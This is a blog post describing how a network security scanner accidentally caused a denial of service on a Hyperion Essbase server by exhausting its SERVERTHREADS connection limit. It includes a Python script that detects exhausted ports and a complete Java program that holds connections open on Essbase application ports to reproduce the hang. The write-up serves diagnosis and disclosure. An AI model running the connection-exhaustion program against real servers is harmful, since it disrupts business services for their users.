Monday, May 9, 2016

Accidental DoS attack on Hyperion Essbase Server


Introduction

One morning Hyperion developers started complaining about Essbase: Hyperion services were not able to connect to Essbase (including the EAS console). Every attempt hung the client, and we had to kill the process through Task Manager. We stopped the Essbase service and started it again, and then everything worked fine. But what had happened to Essbase???


Accidental DoS attack

(The bug applies to Hyperion Essbase 11.1.2.3.500+ and 11.1.2.4.0+)
In my opinion the developers of Hyperion EPM products do not worry seriously about external security, because the products are mostly used in private corporate networks, so they allow old versions of the JDK, application servers and other services, on the assumption that nobody needs to hack Hyperion EPM inside a private corporate network.
But... let us return to our Essbase incident. First I checked the Essbase logs and noticed something interesting:

I saw multiple non-secure connections made directly to the Essbase application process (ESSSVR). I was sure that these multiple connections had hung the Essbase server. The number of connections was equal to the SERVERTHREADS parameter in ESSBASE.cfg. This DoS attack was made by the security scanner that our security team uses to scan the internal network.

How to reproduce this issue?


Let's look at an Essbase application; it has 3 open ports:

Every port can accept only SERVERTHREADS connections.
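Because the thread limit is the whole problem, the condition is easy to watch for from the server side: count ESTABLISHED sockets on each Essbase application port and compare them with SERVERTHREADS from ESSBASE.cfg. The script below is an added example, not code from the original post or from Oracle. It assumes Linux `netstat -tan` style output, an ESSBASE.cfg that sets SERVERTHREADS, SERVERPORTBEGIN and SERVERPORTEND, and the three application ports 32786-32788 from the post; the cfg fragment and the netstat output are constructed sample data so the script runs offline.

```python
import re
from collections import Counter, defaultdict

# Constructed sample ESSBASE.cfg fragment (not taken from a real server).
SAMPLE_ESSBASE_CFG = """\
; sample ESSBASE.cfg
AGENTPORT 1423
SERVERTHREADS 20
SERVERPORTBEGIN 32768
SERVERPORTEND 33768
"""


def _make_sample_netstat():
    """Build constructed `netstat -tan` style output for an ESSSVR process
    that listens on 32786-32788 (the three ports shown in the post)."""
    lines = ["Proto Recv-Q Send-Q Local Address           Foreign Address         State"]
    # port 32786: all 20 threads held by one peer 10.0.0.77 (the scanner)
    for i in range(20):
        lines.append(f"tcp        0      0 10.0.0.5:32786          10.0.0.77:{40000 + i}         ESTABLISHED")
    # port 32787: 16 genuine client sessions from different hosts
    for i in range(16):
        lines.append(f"tcp        0      0 10.0.0.5:32787          10.0.1.{10 + i}:5123          ESTABLISHED")
    # port 32788: 3 sessions plus a TIME_WAIT socket that must not be counted
    for i in range(3):
        lines.append(f"tcp        0      0 10.0.0.5:32788          10.0.1.{50 + i}:5123          ESTABLISHED")
    lines.append("tcp        0      0 10.0.0.5:32788          10.0.1.99:5123          TIME_WAIT")
    # a listening socket and the agent port 1423, both outside our interest
    lines.append("tcp        0      0 0.0.0.0:32786           0.0.0.0:*               LISTEN")
    lines.append("tcp        0      0 10.0.0.5:1423           10.0.1.12:5000          ESTABLISHED")
    return "\n".join(lines)


SAMPLE_NETSTAT = _make_sample_netstat()

CFG_RE = re.compile(r"^\s*SERVERTHREADS\s+(\d+)", re.IGNORECASE | re.MULTILINE)
# proto recv-q send-q local:port remote:port state  (tcp and tcp6 rows)
SOCK_RE = re.compile(r"^tcp\S*\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s+(\w+)", re.MULTILINE)


def parse_serverthreads(cfg_text):
    """Return the SERVERTHREADS value from an ESSBASE.cfg text."""
    m = CFG_RE.search(cfg_text)
    if not m:
        raise ValueError("SERVERTHREADS is not set in ESSBASE.cfg")
    return int(m.group(1))


def established_by_port(netstat_text, port_begin, port_end):
    """Return {local_port: Counter(remote_ip -> connections)} for ESTABLISHED
    sockets whose local port lies in the Essbase application port range."""
    table = defaultdict(Counter)
    for m in SOCK_RE.finditer(netstat_text):
        local_port, remote_ip, state = int(m.group(2)), m.group(3), m.group(5)
        if state != "ESTABLISHED" or not (port_begin <= local_port <= port_end):
            continue
        table[local_port][remote_ip] += 1
    return table


def assess_ports(table, limit, warn_ratio=0.8, peer_ratio=0.5):
    """Classify each port: EXHAUSTED at the thread limit, WARN above
    warn_ratio of it, else OK. Also report a single peer that holds more
    than peer_ratio of the threads, which is the footprint a scanner leaves."""
    report = {}
    for port, peers in sorted(table.items()):
        total = sum(peers.values())
        if total >= limit:
            status = "EXHAUSTED"
        elif total >= warn_ratio * limit:
            status = "WARN"
        else:
            status = "OK"
        top_peer, top_count = peers.most_common(1)[0]
        suspicious = top_peer if top_count > peer_ratio * limit else None
        report[port] = {"used": total, "limit": limit, "status": status, "suspicious_peer": suspicious}
    return report


def main():
    limit = parse_serverthreads(SAMPLE_ESSBASE_CFG)
    table = established_by_port(SAMPLE_NETSTAT, 32768, 33768)
    for port, r in assess_ports(table, limit).items():
        msg = f"port {port}: {r['used']}/{r['limit']} threads in use [{r['status']}]"
        if r["suspicious_peer"]:
            msg += f" - {r['suspicious_peer']} holds most of them"
        print(msg)


if __name__ == "__main__":
    main()
```

On a real server replace the two constants with the contents of ESSBASE.cfg and the output of `netstat -tan`, and run it from cron: a port reported as EXHAUSTED with one suspicious peer is exactly the state the scanner left behind here, and catching it early lets you restart the application before every client hangs.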

I needed to reproduce this issue, so I wrote a simple Java program for it.

import java.io.PrintWriter;
import java.net.Socket;

// Opens NUMBER_OF_SESSIONS connections to every port in the range and never
// closes them, so each connection keeps one Essbase server thread busy.
public class EssbaseDoSConnector {
    public static void main(String[] args) {
        if (args.length != 4) {
            System.out.println("USAGE: HOST BEGIN_PORT END_PORT NUMBER_OF_SESSIONS");
            return;
        }
        String hostName = args[0];
        int startPort = Integer.parseInt(args[1]);
        int endPort = Integer.parseInt(args[2]);
        int sessionNumber = Integer.parseInt(args[3]); // connections per port
        int cnt = 0;
        for (int port = startPort; port <= endPort; port++) {
            for (int j = 0; j < sessionNumber; j++) {
                try {
                    System.out.println("connecting to port " + port);
                    Socket socket = new Socket(hostName, port);
                    cnt++;
                    // Send some junk, as a scanner probe would; the socket is
                    // deliberately left open so the server thread stays busy.
                    PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
                    out.write("TEST MESSAGE\n");
                    out.write("TEST MESSAGE\n");
                    out.write("TEST MESSAGE\n");
                    out.write("TEST MESSAGE\n");
                } catch (Exception e) {
                    System.out.println("Error connecting port " + port + " port is busy");
                }
            }
        }
        System.out.println("FINISH - number of successful connections:" + cnt);
    }
}

Compilation is very simple:

It has 4 parameters:
HOST - Essbase server name
BEGIN_PORT - first port of the Essbase application (in our example 32786)
END_PORT - last port of the Essbase application (in our example 32788)
NUMBER_OF_SESSIONS - number of server threads (SERVERTHREADS) in essbase.cfg

Let's try:

At first sight, nothing critical happens... The thread limit was reached, and then Essbase closed the sessions.

Try again:

The same result, but now the Essbase application cannot accept new incoming connections, and after some time all applications become inaccessible....

We need to restart the Essbase server to repair Essbase....

P.S.

Nobody wanted to attack the Essbase server :) It was a standard security check that hung all our Essbase servers.
Be careful with security scanners. Metalink contains several documents about similar issues, but they did not help, so administrators have to worry about this issue themselves, because it can be critical for the Essbase server and its data.

Good luck :)
